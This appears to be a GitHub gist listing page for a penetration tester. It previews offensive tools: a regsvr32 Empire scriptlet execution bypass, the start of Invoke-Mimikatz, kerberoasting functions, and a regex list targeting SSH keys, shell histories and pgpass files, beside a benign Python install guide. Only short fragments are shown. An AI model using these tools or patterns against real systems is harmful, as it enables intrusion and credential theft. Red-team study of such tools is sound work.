Sparc Flow sparcflow
sparcflow
/ gist:6b4d8df9c798593bbc1f1b5e078a0116
Created
January 21, 2023 20:28
— forked from jaredsburrows/gist:9e121d2e5f1147ab12a696cf548b90b0
full English translation of Phineas Fisher's account of how he took down HackingTeam - https://www.reddit.com/r/netsec/comments/4f3e6p/full_english_translation_of_phineas_fishers/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _ _ ____ _ _ | |
| | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |
| | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |
| | _ | (_| | (__| < | |_) | (_| | (__| <|_| | |
| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) | |
| A DIY Guide | |
sparcflow
/ Backdoor.sct
Created
February 18, 2022 21:15
— forked from carnal0wnage/Backdoor.sct
Execute Script Via regsvr32.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{20001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> |
sparcflow
/ install zOS
Created
February 1, 2021 17:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ========= ========== ===== ===== | |
| ========= ============ ====== ====== | |
| === === ==== ===== ===== | |
| === ========= ====== ====== INSTALLIN' THAT SWEET SWEET | |
| === ======== ============= BIG IRON ON YOUR LINUX LAPTOP | |
| === ========= ============= OR SERVER - BY MR. SKILLFULL | |
| === === ==== === === === | |
| ========= ============ ===== = ===== | |
| ========= ========== ===== ===== |
sparcflow
/ Invoke-mimi.ps1
Last active
January 27, 2021 18:10
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Mimikatz | |
| { | |
| [CmdletBinding(DefaultParameterSetName="DumpCreds")] | |
| Param( | |
| [Parameter(Position = 0)] | |
| [String[]] | |
| $ComputerName, | |
| [Parameter(ParameterSetName = "DumpCreds", Position = 1)] |
sparcflow
/ kerberoast.ps1
Created
December 25, 2020 11:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DomainSearcher { | |
| [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
| [OutputType('System.DirectoryServices.DirectorySearcher')] | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(ValueFromPipeline = $True)] | |
| [ValidateNotNullOrEmpty()] | |
| [String] | |
| $Domain, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DomainSID { | |
| param( | |
| [String] | |
| $Domain | |
| ) | |
| $FoundDomain = Get-NetDomain -Domain $Domain | |
| if($FoundDomain) { | |
| $PrimaryDC = $FoundDomain.PdcRoleOwner |
sparcflow
/ gist:ff2eabaa8e007850acc158ea3495e95f
Created
October 20, 2019 13:35
secret_regex_patterns.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ^.*_rsa$ | |
| ^.*_dsa$ | |
| ^.*_ed25519$ | |
| ^.*_ecdsa$ | |
| \.?ssh/config$ | |
| ^key(pair)?$ | |
| ^\.?(bash_|zsh_|sh_|z)?history$ | |
| ^\.?mysql_history$ | |
| ^\.?psql_history$ | |
| ^\.?pgpass$ |
sparcflow
/ gist:6429f48d2fc1b65bc79cc4ab71a0fa6b
Last active
May 31, 2021 08:31
Installing python 3.7 on Ubuntu 16.04 or 18.04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| === From deadsnakes repo === | |
| sudo add-apt-repository ppa:deadsnakes/ppa | |
| sudo apt update | |
| sudo apt install python3.7 | |
| sudo apt install python3-pip | |
| sudo apt install python3.7-dev | |
| === OR compiling from source === | |
| sudo apt update |